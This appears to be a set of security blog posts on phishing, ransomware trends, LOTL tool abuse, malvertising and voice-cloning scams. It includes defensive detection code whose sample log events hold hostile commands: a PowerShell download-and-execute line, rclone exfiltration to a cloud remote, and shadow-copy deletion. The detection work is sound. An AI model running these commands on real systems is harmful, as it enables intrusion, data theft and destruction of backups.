
Beware: Fake IRS tax email wants your Microsoft account

Last week, the IRS reminded taxpayers that Tax Day, April 18, is Tuesday this week. However, in some states like Alabama, California, and New York, the federal office extended the filing deadlines due to natural disasters. This gives scammers an excellent reason to keep launching tax scam campaigns even though taxes are due tomorrow for most Americans.

Just a few weeks ago, we wrote about a fake IRS tax email carrying a malware payload: Emotet. Now, our Senior Director of Threat Intelligence, Jerome Segura, has found an email with the title “IRS Notice of intent to seize (Levy) Your Property or rights to property”, which was purportedly sent by “Tax IRS 152”.

The email, with an HTML file attachment, contains a short message:

Please note: [redacted]

For information please continue to check here or use our free mobile app. Updates status are made no more than once a day.

Opening the attached HTML file reveals a Microsoft email phishing page. According to Segura, stolen data is sent to a Telegram channel via a bot. So, avoid giving away your credentials, especially if your Microsoft email is tied to a business, if you don’t want scammers hijacking your account and using it for more nefarious purposes.


Avoiding tax scams

Here are some ways you can outsmart tax fraudsters and keep one step ahead of the phishing, malware, and social engineering attacks that come around every year during tax season.

  • File early. One of the quickest ways to stumble into a trap is to leave filing your tax return until the last minute. That added pressure can mean responding to fake emails you otherwise would have ignored.
  • Be careful around suspicious refunds. Tax agencies have a proper process for issuing refunds, as found on their websites. Some, like HMRC, are very clear that refunds are never issued by email. If in doubt, phone the tax office directly and ask if what you have is the real deal or a fake.
  • Beware of fake bank portals. Some tax scams will ask you who you bank with, and then open up a phishing page for that bank. Always navigate directly to your banking website; click-throughs and redirects typically spell danger.
  • Avoid the pressure pitch. Tax scammers like to hurry you along to data theft and malware installs. Claims of only having 24 or 48 hours to file for a refund should be treated with skepticism. As with most solutions for these forms of social engineering, contact the tax entity directly.

Malwarebytes removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

Ransomware in Germany, April 2022 – March 2023

This article is based on research by Marcelo Rivero, Malwarebytes’ ransomware specialist, who monitors information published by ransomware gangs on their Dark Web sites. In this report, “known attacks” are attacks where the victim opted not to pay a ransom. This provides the best overall picture of ransomware activity, but the true number of attacks is far higher.

Between April 2022 and March 2023, Germany was a globally significant target for ransomware gangs. During that period:

  • It was the fourth most attacked country in the world, and the most attacked in the EU
  • The construction sector was harder hit than in the USA, UK, or France
  • LockBit and Black Basta accounted for 54% of known attacks
  • Black Basta attacked targets in Germany far more often than in the UK or France

In August 2022, German power semiconductor manufacturer Semikron disclosed a ransomware attack that had partially encrypted its network, with the attackers claiming to have stolen 2TB of documents.

In the same month, German automotive parts powerhouse Continental was attacked by LockBit, which claimed to have stolen 40TB of files. The company broke off negotiations in late October, and the ransomware gang offered the data for sale or destruction for $50 million, the biggest known ransom of 2022, and the largest this author had seen until LockBit’s equally outlandish request for $80 million from Royal Mail in early 2023.

Stolen Continental data available for sale or destruction

A ransomware attack on German newspaper Heilbronner Stimme in October 2022 disrupted its printing systems, forcing the publication of a six-page emergency edition. The attack affected the entire Stimme Mediengruppe, including companies Pressedruck, Echo, and RegioMail, with Echo’s website and e-paper accessibility also compromised. Editor-in-chief Uwe Ralf Heer reported that a well-known cybercriminal group encrypted its systems and left ransom demands, but did not specify further.

In November 2022, the Vice Society ransomware gang claimed responsibility for a cyberattack on the University of Duisburg-Essen (UDE). The attackers leaked files including backup archives, financial documents, research papers, and student spreadsheets. On January 9, 2023, the university announced that due to extensive and complex damage caused by the attack, its entire IT infrastructure would need to be reconstructed.

Germany is a prime target

In the 12 months from April 2022 to March 2023, Germany was a globally significant target for ransomware, ranking as the fourth most attacked country by known attacks. It was the most attacked country in the EU, and the most attacked country where English isn’t the principal language.

Known attacks in the ten most attacked countries between April 2022 – March 2023

Given the disparity between the USA and the rest of the world in terms of number of attacks, it would be easy to conclude that ransomware is, first and foremost, a USA problem. It is not. The size and nature of the US economy means that it has many more targets for ransomware gangs than other countries in the top ten.

We can account for the difference in the size of countries’ economies by dividing the number of known ransomware attacks by a country’s nominal GDP, which gives us an approximate rate of attacks per $1T of economic output. On that basis, the difference between the countries in the top ten is far smaller than the total number of known attacks would suggest. The top ten most attacked countries all suffered between 15 and 66 known attacks per $1T of economic output.

The ten most attacked countries between April 2022 – March 2023, ordered by attacks per $1T GDP

The sizes of the countries in the top ten also vary enormously, and we can try to account for that by dividing known attacks by the size of each country’s population. On that measure, again, the differences between countries are much smaller than a simple count of known attacks suggests.

On a known attacks per capita basis, Germany sits in a cluster of four advanced European economies with nearly identical rates of attack. In all the variations of our top ten, English-speaking countries occupy at least three of the top five positions, and English-speaking countries with smaller populations and economies, like Canada and Australia, seem to suffer disproportionately.

The situation in Germany is far from good; it just isn’t quite as bad as in the very worst countries. By any measure, Germany is one of the most attacked countries in the world, and its organisations are prime targets for ransomware gangs.

The ten most attacked countries between April 2022 – March 2023, ordered by attacks per capita

As in most countries, the German services sector is the hardest hit, accounting for 28% of attacks in the last 12 months, just slightly above the global average of 25%. In most respects, German industry sectors are attacked in roughly the same proportions as they are in the UK and France, with some notable exceptions. There were no known attacks on German healthcare in the last 12 months (which, again, does not include unknown attacks), the country suffered fewer attacks on its legal services than either the UK or France, and it does not seem to have suffered the same problems France has had protecting its government sector, or the UK its education sector.

Where Germany suffers more than its neighbours is construction. Its 12% share of known attacks is double the global average, and notably higher than the USA (7%), UK (7%), and France (5%).

Known ransomware attacks by industry sector in Germany, April 2022 – March 2023

Black Basta’s hunting ground

In the UK, no individual ransomware was used in more than two known attacks on construction. In France one gang, LockBit, recorded three. In Germany, two different gangs recorded five known attacks against construction, accounting for a little over two thirds of the total. One of those gangs was LockBit, which is unsurprising given its position as by far the most used ransomware globally. The other was Black Basta, which recorded more attacks against German construction targets in 12 months than it did in the whole of France in the same period.

It seems Black Basta has an appetite for German targets. In the last 12 months it was the second most used ransomware in Germany, with 27 known attacks. In the same period it was busy in the UK with 10 attacks, although overshadowed there by LockBit, Vice Society and others, and it recorded just three attacks in France, where LockBit absolutely dominated.

Ransomware with two or more known attacks in Germany, April 2022 – March 2023

In the last year, Black Basta and LockBit were the only ransomware that registered more than four known attacks in a month, with both going as high as eight. Between them, the two groups accounted for 54% of known attacks in Germany and largely determined whether the country would have a bad month at the hands of ransomware gangs or a terrible one.

Monthly ransomware attacks in Germany with LockBit and Black Basta highlighted, April 2022 – March 2023

Black Basta does not reinvent the wheel in the way it operates. Like other ransomware groups, its attacks frequently begin with initial access gained through phishing. A typical attack might start with an email containing a malicious document in a zip file. Upon extraction, the document installs the Qakbot banking trojan to create backdoor access and deploy SystemBC, which sets up an encrypted connection to a command and control server. From there, Cobalt Strike is installed for network reconnaissance and to distribute additional tools.

As is the overarching trend for ransomware groups these days, Black Basta’s primary goal is to steal data so that it can hold the threat of a leak over its victims. The data is generally stolen using Rclone, which filters and copies specific files to a cloud service. After the data is exfiltrated, the ransomware encrypts files, appending the “.basta” extension, erases volume shadow copies, and presents a ransom note named readme.txt on affected devices. Attackers using Black Basta may be active on a victim’s network for two to three days before running their ransomware.

Conclusions

In the last 12 months, Germany was a globally significant hunting ground for ransomware gangs, and the country with the fourth highest total of known attacks. Across the various industry sectors, construction was over-represented, suffering a higher proportion of known attacks than the construction sectors in the USA, France, and the UK. Much like the education sector in the UK and the government sector in France, it should be alarming that, with an entire world of targets to choose from, the sector has attracted a disproportionate amount of attention.

In particular, the German construction sector suffered at the hands of LockBit and Black Basta; the latter displayed a liking for German targets of all kinds and was the second most used ransomware in the country. Black Basta recorded considerably more attacks in Germany in the last year than in either the UK or France. In fact, the only country in the world to suffer more Black Basta attacks in the last twelve months than Germany was the USA.

How to avoid ransomware

  • Block common forms of entry. Create a plan for patching vulnerabilities in internet-facing systems quickly; disable or harden remote access like RDP and VPNs; use endpoint security software that can detect exploits and malware used to deliver ransomware.
  • Detect intrusions. Make it harder for intruders to operate inside your organization by segmenting networks and assigning access rights prudently. Use EDR or MDR to detect unusual activity before an attack occurs.
  • Stop malicious encryption. Deploy Endpoint Detection and Response software like Malwarebytes EDR that uses multiple different detection techniques to identify ransomware, and ransomware rollback to restore damaged system files.
  • Create offsite, offline backups. Keep backups offsite and offline, beyond the reach of attackers. Test them regularly to make sure you can restore essential business functions swiftly.
  • Don’t get attacked twice. Once you’ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again.


Living Off the Land (LOTL) attacks: Detecting ransomware gangs hiding in plain sight

Regular readers of our monthly ransomware review (read our April edition here) know that Ransomware-as-a-Service (RaaS) gangs have been making headlines globally with their disruptive attacks on organizations.

Sometimes, though, it’s not enough to merely know about the problem.

In order to truly protect ourselves from RaaS gangs, we have to ‘peel back the onion’, so to speak, and get a closer look at how, exactly, they behave. If we know how RaaS gangs evade detection once in a network, for example, we may be able to kick them out before they can do any damage.

One of the most concerning behaviors we’ve observed from RaaS gangs is their use of Living off the Land (LOTL) attacks, where attackers leverage legitimate tools to evade detection, steal data, and more.

Let’s dive into the dangers of LOTL attacks in RaaS operations and provide guidance for under-resourced IT teams on how to detect and block such threats.

The deceptive nature of LOTL attacks

In an ideal world, IT teams whose organizations are under attack would have clear and direct evidence of the malicious activity.

For example, if unusual network connections are being made to remote IP addresses associated with known malicious actors, then there’s little doubt that you’re under attack—enabling IT to put a halt to the behavior early on.

But now imagine you’re diligently monitoring a network for any signs of suspicious activity. As you scan a seemingly endless stream of logs, searching for any anomalies that could signal trouble, you notice some activity from PowerShell, a versatile and legitimate scripting tool.


Script Block Logging records all blocks of code as they’re executed by PowerShell, which could point you to suspicious activity.

Namely, there are scripts using commands that an attacker could use to steal data from the company’s network, but which also resemble the routine tasks IT professionals run for system administration. Considering it’s regular business hours, you figure it’s part of a routine IT maintenance operation and move on.

But, lo and behold, it was a RaaS gang the whole time!

The attacker had studied the company’s environment and had a deep understanding of the tools and processes typically used by employees, and so they managed to avoid raising suspicion by blending in with typical PowerShell usage. By conducting the attack during normal business hours, the attackers also avoided any of the usual scrutiny that would come from moving across a network late at night. 

This is exactly why LOTL attacks are so dangerous: by mimicking normal behavior, LOTL attacks make it extremely difficult for IT teams and security solutions to detect any signs of malicious activities. Experienced analysts, however, might be able to pick up on subtle anomalies or patterns that indicate a LOTL attack, leveraging their expertise and deep understanding of system behaviors.

On the other hand, new or under-resourced teams may struggle to identify such attacks due to a lack of experience or insufficient tools, leaving them vulnerable to these stealthy threats.

5 LOTL tools used by ransomware gangs 

While attackers use a seemingly innumerable number of legitimate tools for LOTL attacks, below are five of the most common ones we’ve seen the most active ransomware gangs using for their attacks.

  • PowerShell. What it is: a versatile scripting language and shell framework for Windows systems. Abused to: execute malicious scripts, maintain persistence, and evade detection. Used by: LockBit, Vice Society, Royal, BianLian, ALPHV, Black Basta.
  • PsExec. What it is: a lightweight command-line tool for executing processes on remote systems. Abused to: execute commands or payloads via a temporary Windows service. Used by: LockBit, Royal, ALPHV, Play, BlackByte.
  • WMI. What it is: an admin feature for accessing and managing Windows system components. Abused to: execute malicious commands and payloads remotely. Used by: LockBit, Vice Society, Black Basta, Dark Power, Cl0p, BianLian.
  • Mimikatz. What it is: an open source tool for Windows security and credential management. Abused to: extract credentials from memory and perform privilege escalation. Used by: LockBit, Black Basta, Cuba, ALPHV.
  • Cobalt Strike. What it is: a commercial pen-testing tool to assess network security and simulate advanced threat actor tactics. Abused to: command and control, lateral movement, and exfiltration of sensitive data. Used by: LockBit, Black Basta, Royal, ALPHV, Play, Cuba, Vice Society.

Again, readers of our monthly ransomware review will recognize that the gangs listed here are responsible for the lion’s share of yearly ransomware attacks.

LockBit, for example, topped our 2023 State of Malware Report, being responsible for more than three times as many attacks as the next most active ransomware, ALPHV. In February 2023 alone, the LockBit group posted 126 victims on its leak page.

Vice Society, on the other hand, is responsible for 70 percent of known attacks on UK education institutions.

Advice for IT teams

The four tips listed below, combining cutting-edge technology with expertise, can greatly help IT teams uncover LOTL attacks:

1. Regularly monitor network traffic and logs

  • Regularly analyze your network traffic for any unusual patterns or connections to known malicious IP addresses or domains associated with the use of tools like Chisel, Qakbot, or Cobalt Strike. 
  • Enable logging on critical systems (firewalls, servers, and endpoint devices) and regularly review logs for unusual activities or signs of compromise.

2. Stay informed of the latest threat intelligence

  • Leverage threat intelligence feeds to stay informed about new attack techniques, indicators of compromise (IOCs), and other relevant threat data.
  • Use this data to fine-tune your security monitoring, detection, and response capabilities to identify and mitigate LOTL attacks.

3. Leverage behavioral analysis and anomaly detection

  • Implement advanced monitoring tools that focus on detecting unusual user or system behavior rather than relying solely on known signatures or patterns.
  • Machine learning and artificial intelligence can be leveraged to identify deviations from normal behavior, which might indicate an ongoing LOTL attack.


Malwarebytes EDR observes the behaviors of processes, registry, file system, and network activity on the endpoint using a heuristic algorithm looking for deviations. Here you can see all detection rules triggered in the suspicious activity and their mapping to MITRE ATT&CK.

4. Restrict the abuse of legitimate tools

  • Focus on managing and controlling the use of legitimate tools and system features often exploited in LOTL attacks.
  • Limit access to certain tools to only the users who require them, monitor their usage, and apply specific security policies to restrict potentially harmful actions.

In short, by continuously analyzing network and system data, identifying potential weak points, and anticipating attacker tactics, IT teams can begin to get the upper hand against RaaS gangs that employ LOTL techniques.
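As an added example (not code from the article or from Malwarebytes), here is the kind of log review the tips above and the Black Basta chain described in the ransomware report call for: a small rule pass over constructed endpoint events that maps hits to MITRE ATT&CK and escalates only when one host shows several distinct techniques, since a single PowerShell or PsExec hit is often just admin work. The event ids, field names, sample lines and thresholds are assumptions.

```python
"""Rule-based pass over endpoint events for LOTL tool abuse and the Black Basta
chain (PsExec, WMI, PowerShell, Rclone exfiltration, shadow-copy deletion,
".basta" renames). Added example, not Malwarebytes code. Assumptions: events
arrive as JSON lines; ids 4104 (PowerShell script block), 4688 (process
creation) and 7045 (service installed) follow Windows event ids, "rename" is a
made-up id for file renames, and the field names are my own."""
import json
import re
from collections import defaultdict

# Constructed sample telemetry (not real): one benign-looking host and one that
# shows several stages of the chain within the same window.
SAMPLE_EVENTS = r"""
{"id": 4104, "host": "ws-17", "user": "jdoe", "text": "Get-ChildItem C:\\Reports | Measure-Object"}
{"id": 4688, "host": "ws-17", "user": "jdoe", "cmd": "powershell.exe -nop -w hidden -enc <base64 omitted>"}
{"id": 4104, "host": "fs-02", "user": "svc_backup", "text": "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/x.ps1')"}
{"id": 7045, "host": "fs-02", "user": "svc_backup", "service": "PSEXESVC"}
{"id": 4688, "host": "fs-02", "user": "svc_backup", "cmd": "wmic /node:db-01 process call create \"cmd.exe /c hostname\""}
{"id": 4688, "host": "fs-02", "user": "svc_backup", "cmd": "rclone.exe copy D:\\Shares\\Finance mega:dump --transfers 32"}
{"id": 4688, "host": "fs-02", "user": "svc_backup", "cmd": "vssadmin.exe delete shadows /all /quiet"}
{"id": 4688, "host": "fs-02", "user": "SYSTEM", "cmd": "C:\\Windows\\System32\\svchost.exe -k netsvcs"}
{"id": "rename", "host": "fs-02", "path": "D:\\Shares\\Finance\\q1.xlsx.basta"}
{"id": "rename", "host": "fs-02", "path": "D:\\Shares\\Finance\\q2.xlsx.basta"}
{"id": "rename", "host": "fs-02", "path": "D:\\Shares\\Finance\\budget.docx.basta"}
"""

# Which field of each event id carries the string worth inspecting.
FIELD_FOR_ID = {4104: "text", 4688: "cmd", 7045: "service"}

# (rule name, MITRE ATT&CK technique, event id, case-insensitive regex)
RULES = [
    ("hidden or encoded PowerShell launch", "T1059.001", 4688,
     r"powershell(\.exe)?\s.*(-enc\w*\s|-e\s|-w(indowstyle)?\s+hidden)"),
    ("download-and-execute script block", "T1059.001", 4104,
     r"IEX\s*\(.*DownloadString"),
    ("PsExec service installed", "T1569.002", 7045, r"^PSEXESVC$"),
    ("remote process creation via WMI", "T1047", 4688,
     r"wmic(\.exe)?\s.*/node:.*process\s+call\s+create"),
    # rclone destination of the form remote:path; a local drive like D:\ is excluded
    ("rclone copy to a cloud remote", "T1567.002", 4688,
     r"rclone(\.exe)?\s+(copy|sync|move)\s.*\s[\w-]+:(?![\\/])"),
    # the article says Black Basta erases shadow copies; vssadmin is the usual way
    ("shadow copy deletion", "T1490", 4688, r"vssadmin(\.exe)?\s+delete\s+shadows"),
]
BASTA_EXT = ".basta"  # extension the article attributes to Black Basta


def parse_events(text):
    return [json.loads(line) for line in text.strip().splitlines() if line.strip()]


def match_rules(events):
    """One finding per (event, rule) hit."""
    findings = []
    for ev in events:
        field = FIELD_FOR_ID.get(ev["id"])
        if field is None:
            continue
        for name, technique, ev_id, pattern in RULES:
            if ev["id"] == ev_id and re.search(pattern, ev[field], re.IGNORECASE):
                findings.append({"host": ev["host"], "user": ev.get("user", ""),
                                 "rule": name, "technique": technique})
    return findings


def detect_encryption(events, threshold=3):
    """Fire once a host has renamed `threshold` files to .basta: the mass rename
    is the encryption stage (Data Encrypted for Impact)."""
    renamed = defaultdict(int)
    for ev in events:
        if ev["id"] == "rename" and ev["path"].lower().endswith(BASTA_EXT):
            renamed[ev["host"]] += 1
    return [{"host": host, "user": "", "rule": f"{n} files renamed to {BASTA_EXT}",
             "technique": "T1486"} for host, n in renamed.items() if n >= threshold]


def correlate(findings, min_techniques=3):
    """A lone hit is often admin work (the 'regular business hours' trap above);
    several distinct techniques on one host is the hands-on-keyboard chain."""
    per_host = defaultdict(set)
    for f in findings:
        per_host[f["host"]].add(f["technique"])
    return {h: sorted(t) for h, t in per_host.items() if len(t) >= min_techniques}


def run(text=SAMPLE_EVENTS):
    events = parse_events(text)
    findings = match_rules(events) + detect_encryption(events)
    return findings, correlate(findings)


if __name__ == "__main__":
    found, chains = run()
    for f in found:
        print(f"{f['host']:6} {f['technique']:10} {f['rule']}")
    for host, techniques in chains.items():
        print(f"\nescalate {host}: {len(techniques)} distinct techniques {techniques}")
```

On the sample data ws-17 produces one finding and stays below the correlation threshold, while fs-02 trips six distinct techniques and is the host to escalate.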

24×7 security monitoring and threat hunting for your organization

Monitoring network traffic, enabling and reviewing logs, checking for anomaly detection, and implementing application control are essential steps for detecting and blocking malicious activity. However, these efforts often require around-the-clock coverage and deep cybersecurity expertise, which can be difficult for small and medium-sized organizations to maintain.

This is where Malwarebytes Managed Detection and Response (MDR) comes in.


Malwarebytes MDR analysts are experienced in detecting malicious use of legitimate tools and blocking attackers. They use their expertise to identify unusual patterns or connections to malicious IP addresses, domains, or unauthorized application usage related to the LOTL attacks conducted by the RaaS gangs.

By partnering with Malwarebytes MDR, businesses can enhance their security posture and gain peace of mind, knowing that a skilled team of security experts is working 24x7x365 to proactively detect and respond to potential threats.

Woman tracks down and turns table on Airbnb scammer

The internet is full of Airbnb scams and accounts told by victims. But there is a twist in this latest story-gone-viral that is usually lacking in most narratives: The victim evens the score.

Airbnb host and scammer “Mr. Tyler” met his match when his would-be guest, TikTok user Olivia (@livvoogus), discovered his personal information after arriving at a property in Florida she could not get into. Her scam suspicions were confirmed that day.

In a TikTok clip detailing the events, she revealed she booked the place months before the New Year’s Eve music festival she and her friends planned to attend. The listing didn’t raise any red flags, and Mr. Tyler was a Superhost—described as “the best-rated, most experienced hosts” by Airbnb. The property also had good reviews.

Then things got sketchy while driving up to Jacksonville.

“The Airbnb host had sent us two different codes for the door and just stopped responding to any questions that we had, like where to park or how to get into the building—just kind of went ghost,” Olivia said. The neighbor came out and told them that a couple who came by last night also couldn’t get in, suggesting they were not the only ones Mr. Tyler scammed.

“The person who had lived there got evicted because, according to the lease, you’re not allowed to do Airbnbs out of the apartment, and he just never took the listing down,” she said.

Enraged, Olivia searched the internet for details about her host and eventually found his name, birthday, and parents’ address. She messaged Mr. Tyler to ask if she was supposed to meet him at his parents’ place, the address of which she included, because what he gave them was the incorrect address.

“This man called me back. So. Quickly,” Olivia enthused. What came next was also recorded and posted on TikTok. The clip was captioned, “when you travel long and far to find out your airbnb is fake and you go to extreme lengths to find out everything about the host and then call them to expose such information.”

In the end, Airbnb refunded Olivia, and she found a hotel room. The company paid a percentage of the cost for the following night, although Olivia believes Airbnb should’ve paid for it all. One TikTok commenter jokingly suggested that Olivia “send a bill to Tyler’s parents’ house”.



Massive malvertising campaign targets seniors via fake Weebly sites

Knowing their audience is something scammers excel at, and for very good reason. This is particularly true for tech support scammers whose prime targets are seniors.

By understanding what retirees are searching for and abusing various online platforms, crooks can precisely go after the demographic they are interested in and lure them onto sites that they control.

We have been observing a specific malvertising campaign via Google ads aimed at seniors. The threat actor is creating hundreds of fake websites via the Weebly platform to host decoy content to fool search engines and crawlers while redirecting victims to a fake computer alert.

Based on our analysis, this particular scheme started sometime in the summer of 2022 but has drastically increased in prevalence in the past month. While we have been sharing details with affected parties privately for a few weeks, we are now exposing what we know. 

Popular search terms

Malvertising, or the use of ads to deliver malicious content, is not something new. Yet, over the years various threat actors have used it for different purposes.

It is a cost-effective and efficient way to reach targets and then monetize them with a payload that can be anything from malicious software to plain old scams. But we don’t tend to hear about the latter as much because the impact of scams may be harder to quantify.

In talking to victims, you will often hear them describe that they were just looking up something and clicked somewhere when all of a sudden this or that happened.

As we saw an increase in our telemetry for tech support scam pages, we decided to replicate some of those searches and came up with keywords we thought the senior/retired audience might use often. In order to maximize our chances of identifying the campaign we used a real machine and prepared it with a specific profile.

By far, anything related to recipes and cooking is a popular search query. We had previously identified another malvertising campaign using this same theme.

We also tried to look for games such as Solitaire.

And of course, we couldn’t do without checking on the weather.

Decoy sites

While the links for the sponsored sites may look legitimate, they aren’t. The problem is that unless you are the intended victim, you will only see the clean content. It matters because crawlers and other ad quality check tools may validate the advertiser and allow the ad to be reached by a large audience.


Each site is very simple and contains content that was stolen from somewhere else and put together hastily.

The threat actor has been creating hundreds of those websites via the Weebly platform which they are abusing. Some days, we saw an average of 10 new Weebly hostnames used by the scammers.


Cloaking

As mentioned earlier, it is important for the scammers to stay under the radar and make it as though these webpages are legitimate. They can do this easily by using a technique known as cloaking.

Cloaking is simply showing different content based on a target audience and being able to hide the payload from undesirable visitors (i.e. web crawlers, security researchers).

The scammers did this in various ways, some quite simple (user-agent and IP check) but they also paid for a professional cloaking service.


The cloaker API will return a response that contains two different links:

  • The “safe_page” which is the URL for the decoy Weebly site

  • The “money_page” which is the URL to make money from

In this case the money page is a URL belonging to Digital Ocean and hosting a tech support scam page.
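As an added example (not the article’s or Malwarebytes’ code), the kind of check a researcher can run against a suspected decoy: fetch the landing URL under a crawler profile and under typical victim profiles, then compare the final host and the body. The fetch callable, profile names, threshold and the stub HTML are assumptions, and a cloaker that also keys on the visitor’s IP, as the article notes, will not be caught from a data-centre address.

```python
"""Cloaking check for a suspected malvertising landing page: request the same URL
under several visitor profiles and compare what comes back. Added example, not
Malwarebytes code. Assumes fetch(url, headers) -> (final_url, body); the stub
below is constructed so the check runs offline."""
import urllib.request
from difflib import SequenceMatcher
from urllib.parse import urlsplit

# What an ad-quality crawler sends versus what a retiree's browser sends.
PROFILES = {
    "crawler": {"User-Agent": "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"},
    "windows_chrome": {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
                                     "(KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36"},
    "mac_safari": {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_3) AppleWebKit/605.1.15 "
                                 "(KHTML, like Gecko) Version/16.4 Safari/605.1.15"},
}


def http_fetch(url, headers, timeout=10):
    """Real fetch for a live URL: follows redirects and returns where it ended up."""
    req = urllib.request.Request(url, headers=headers)
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.geturl(), resp.read().decode("utf-8", "replace")


def similarity(a, b):
    """0.0 (nothing in common) to 1.0 (identical) over the raw HTML."""
    return SequenceMatcher(None, a, b).ratio()


def check_cloaking(url, fetch, profiles=PROFILES, baseline="crawler", threshold=0.8):
    """Compare every profile against the crawler view. A different final host or a
    body that diverges sharply from the decoy marks that profile as cloaked."""
    views = {name: fetch(url, headers) for name, headers in profiles.items()}
    base_url, base_body = views[baseline]
    report = {}
    for name, (final_url, body) in views.items():
        if name == baseline:
            continue
        ratio = similarity(base_body, body)
        moved = urlsplit(final_url).netloc != urlsplit(base_url).netloc
        report[name] = {"final_url": final_url, "similarity": round(ratio, 2),
                        "cloaked": moved or ratio < threshold}
    return report


# Constructed stand-in for the "safe_page" / "money_page" split described above.
DECOY_HTML = ("<html><body><h1>Grandma's Easy Apple Pie</h1>"
              "<p>Preheat the oven to 180C and roll out the pastry.</p></body></html>")
ALERT_HTML = ("<html><body><h1>Security Alert</h1>"
              "<p>This computer has been locked. Call the number shown.</p></body></html>")


def fake_fetch(url, headers):
    """Behaves like the cloaked site: crawlers get the decoy, everyone else is redirected."""
    if "Googlebot" in headers["User-Agent"]:
        return url, DECOY_HTML
    return "https://money-page.example.invalid/alert.html", ALERT_HTML


def honest_fetch(url, headers):
    """A site with nothing to hide serves the same page to everyone."""
    return url, DECOY_HTML


if __name__ == "__main__":
    for name, result in check_cloaking("https://decoy.example.invalid/", fake_fetch).items():
        print(name, result)
```

Swap `fake_fetch` for `http_fetch` to run the same comparison against a live URL; repeating it from a consumer network rather than a cloud host matters for cloakers that filter by IP.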

Tech support scam

Most scammers will use a template for the tech support scam page which is customized for the operating system and browser the victim is running. This scheme is adapted for both Windows and Mac, supporting the Chrome, Opera, Safari and Firefox browsers.


In this case they are also abusing a browser feature that captures keystrokes when a page is in fullscreen by targeting the navigator.keyboard.lock API. What this means in practical terms is that the user will not be able to exit from the fullscreen page unless they press and hold the Escape key for several seconds. Many people will panic and call the phone number on the screen, only to fall into the hands of scammers and lose hundreds, sometimes even thousands of dollars.


Protection from malvertising attacks

Malvertising can come in different forms and ad formats, and the same can be said about the payloads that are distributed.

As we saw earlier this year, clicking on the top ad for a software download doesn’t always get you what you wanted; in fact it can infect your computer with malware. Threat actors are very good at impersonating legitimate brands and setting up convincing websites.

We have reported and continue to report this malvertising campaign to Google and Block Inc. (Weebly).


We always recommend using a layered approach to security and for malvertising you will need web protection combined with anti-malware protection. Malwarebytes Premium for consumers and Endpoint Protection for businesses provide real-time protection against such threats.


Is AI being used for virtual kidnapping scams?

You may have seen a worrying report of Artificial Intelligence (AI) being used in a virtual kidnapping scam. The AI was supposedly used to imitate the voice of an Arizona resident’s daughter, who claimed to have been kidnapped. The daughter was safe and well elsewhere on a school trip. Unfortunately, with the daughter out of sight this just made the scam seem more believable. Was she actually on the trip, or kidnapped? With no way to know right away, all the parent could do was listen to a demand for $1m and the threat of terrible things happening to their daughter.

The scammers dropped the ransom down to $50k after being told that the money simply wasn’t available, and while all of this was going on, a friend of the family, and law enforcement, were able to confirm that the supposedly kidnapped daughter was in fact safe and well.

Virtual kidnapping scams have been around for many years, but this is a new spin on a well-worn technique.

The imitated child’s parent is convinced that some form of AI was used in this instance. To do this, scammers would have had to obtain some samples of the daughter’s voice. The samples would then have been fed into a machine learning algorithm which learned how she speaks, giving the scammers a computer program that can speak like the victim.

This technique certainly works, and can produce startling results. To hear for yourself, take a listen to podcast.ai, a podcast entirely generated by AI, that features guests like the late Steve Jobs.

The case for AI

Can we be sure that what happened here was down to AI?

The victim claims that the voice was definitely that of her daughter. You would expect someone to recognise a fake or an imitation of their own child. Think how many celebrity impersonators you’ve heard on TV or elsewhere, and how many of them are actually good at it. More often than not, the slightest imperfections really stand out. Now apply this to a mother and her daughter. She’s going to have a very good idea what her offspring does and doesn’t sound like.

Subbarao Kambhampati, a computer science professor at Arizona State University, told the New York Post that it’s possible to spoof a voice in convincing fashion from just three seconds of audio.

According to the victim, her daughter has no social media presence to speak of, but has done a few short public interviews. In theory, this could be enough for the fraudsters to create a working facsimile of her voice.

None of this is proof that AI was used, but none of it rules out AI either.

The case against AI

Creating a replica voice from three seconds of audio sounds scary, but in practice things aren’t quite so cut and dried. We covered a great example of this a little while ago, involving a journalist logging into his telephone banking via use of AI voice replication. It’s definitely not an exact science, and getting the voice right can take many attempts, samples, and requires an AI tool that can stitch everything together to an acceptable standard.

In terms of the mother’s claim she recognised her daughter’s voice, that’s complicated. Understandably, she will have experienced a considerable level of panic when receiving the call, and that might have affected her ability to identify her daughter. CNBC wrote about the phenomenon of virtual kidnappings in 2018, before the current AI boom. In every case listed in its article, the person stuck on the phone is convinced the voice on the other end of the line is who the fake kidnapper claims them to be. Teenage sons, younger daughters, men in their thirties…the horror of these calls has the victim pretty much ready to stand up in court and state that this was the real deal.

This effect of “Yes, it’s them” has been happening for years, long before AI came onto the scene. Is this what’s happened in the AI kidnap scam above? And why would virtual kidnappers bother to replicate someone’s voice if the victim is going to believe it’s all real anyway?

Protection from virtual kidnap scams

Steering clear of this kind of attack isn’t particularly affected by whether or not the person screaming down the phone is an impersonator or a slice of AI. The basics remain the same, and social engineering is where a lot of these attacks take shape. It’s not a coincidence that most of these stories involve the supposed kidnap victim being on holiday or away from the family home when the bogus call comes through. There are some things you can do to blunt the effect of virtual kidnap scams:

  • Be vacation smart. Avoid posting travel dates and locations that could add some fake legitimacy to a scammer’s call.

  • Make your data private. Revisit your online presence, and lock down or delete your data so scammers know less about you.

  • A plausible alert. Consider a password that family members can use to confirm they actually are in danger.


Malwarebytes removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

Port scan attacks: Protecting your business from RDP attacks and Mirai botnets

Compromised IP addresses and domains—otherwise legitimate sites that are exploited by hackers without the owner’s knowledge—are frequently utilized to conduct port scanning attacks.

Port scanning involves systematically scanning a computer network for open ports, which can then be exploited by threat actors to gain unauthorized access or gather information about the system’s vulnerabilities.

In this article, we will explain the two biggest threats utilizing port scanning attacks, RDP attacks and Mirai botnets, and how businesses can protect themselves using Malwarebytes for Business.

Compromised detections: RDP attacks and Mirai botnets

Cybercriminals typically conduct reconnaissance on the target port before using what are called dictionary attacks, entering and trying out known usernames and passwords to see if any of the combinations grant access.

